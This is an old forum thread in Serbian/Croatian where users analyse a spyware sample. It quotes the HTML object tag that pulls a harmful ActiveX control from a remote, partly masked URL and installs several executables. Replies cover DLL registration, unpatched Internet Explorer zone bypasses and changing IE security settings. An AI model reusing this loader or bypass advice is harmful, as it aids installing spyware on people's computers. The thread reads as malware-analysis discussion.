[ Krajisnik @ 14.12.2004. 02:47 ] @
Istrazio sam jedan spyware i neke stvari mi nisu jasne.. Evo ovako otprilike izgleda HTML stranica sa stetnom ActiveX kontrolom...

Code:

<html><head></head>
<body>
<object
id='Client1' width=1 height=1 
classid='clsid:15AD4789-CDB4-47E1-A9DA-992EE8E6BAD6' 
codebase='http://wi****s.com/get_file.php?p=9054e26d76a2c****:****57d857#version=1,0,0,117'>
<param name='param' value='91d7785*...*:*...*366646265'>
</object>

</body></html>

Nakon sto se ovaj kod pokrene, pitace "Do you wish to install bla....", i kad kliknem YES, on instalira NEKOLIKO EXE fajlova u pozadini...

Medjutim....
Kad se manualno u IExploreru otvori 'http://wi****s.com/get_file.php?p=9054e26d76a2c****:****57d857#version=1,0,0,117'
Otvori se Save As dialog, "Do you wish to save file1.cab"... Normalno, downloadovao sam ga, i unutar tog CAB fajla, nasao sam SAMO spyware.dll...

E, mene sad zanima, kako bih ja "pokrenuo" ovaj CAB fajl lokalno da bi se svi ti programi instalirali isto kao kad se ide preko ActiveX popup-a i klikne YES?!?
[ Shadowed @ 14.12.2004. 14:09 ] @
Evo kako to u stvari radi. IE, kad naidje na onakav html kod, ako postoji intaliran taj .dll on pravi COM objekat iz njega. Taj objekat ima sve moguce dozvole na racunaru koje i IE (pisanje/brisanje po disku i sl.). On je taj koji download-uje te .exe fajlove i pokrece ih.

Ako imas .dll registrujes ga sa
c:\>regsvr32.exe imefajla.dll

Kada ga jednom instaliras nece iskakati nikakav popup (iako to i nije popup, al' ajd') vec ce raditi kad god naidjes na takvu html stranu.
[ Krajisnik @ 15.12.2004. 04:43 ] @
Jok, nece da radi.. To sam prvo probao... registrovao sam DLL manualno, al nista.. Kad pokrenem HTML fajl sa tim kodom, opet mi se pojavi ACtiveX security warning..
Mada mozda nisam nesto dobro shvatio posto je kod dosta velik...
Evo,uploadujem kompletan primer pa ako imas VMware, probaj....
[ Sundance @ 15.12.2004. 04:57 ] @
Je li imas SP2 na toj virtualnoj masini na kojoj testiras?
[ Krajisnik @ 15.12.2004. 05:54 ] @
Jok, obicna default instalacija XP SP2-Pro instalirana na VMware.. Gledao sam malo form.php code, i ovo sto vidis vezano za sp2 se pojavljuje samo u slucaju da JavaScript otkrije da je rec o SP2...
[ Sundance @ 15.12.2004. 06:09 ] @
Kako mislis i "Jok" i "instalacija xp SP2". Pa zar "jok" ne znaci "ne"? :)

SP2 puno toga steze oko sistema, pogedaj malo opcije u IE->Tools->Internet Options->Security->Custom i postavke vezane za ActiveX. Moguce je da lokalno skinuti fajlovi imaju razlicita sigurnosna ogranicenja od onih koji su direktno "pokrenuti" iz browsera, pokusaj skuziti u kojoj je postavci caka.
[ Krajisnik @ 15.12.2004. 06:16 ] @
jebiga.. 7 ujutro..
Mislio sam reci obican XP Pro(valjda je to SP1)...
Znaci, defaultna instalacija, bez ijednog patcha...

Ako se ne nadje resenje ovim putem, da li postoji neki nacin da se pomocu scripta ili tako neceg, promene security settings u IEu??
[ Sundance @ 15.12.2004. 06:22 ] @
Mislim da ce ti i onda iskociti dijalog o potvrdi... Ali ako ciljas na BAS DEFAULTNU SP1 instalaciju bez ikakvih zakrpa, onda imas masu bugova kojim mozes zaobici Internet Zone :) Saraj malo po bugtraq listama, Guninski is your new best friend :)
[ Krajisnik @ 15.12.2004. 17:43 ] @
Sto se tice IE exploita, pratim bas svaki koji se pojavio, i tu nije cilj da se zaobice zona.. Ima samo jedan exploit vredan paznje a to je IEchromless(google), medjutim ni on ne sluzi ovoj svrsi...
Mislim da pomocu regedita mogu da izmenim security settings, ili disablujem ActiveX... S tim cu sad da se cimam...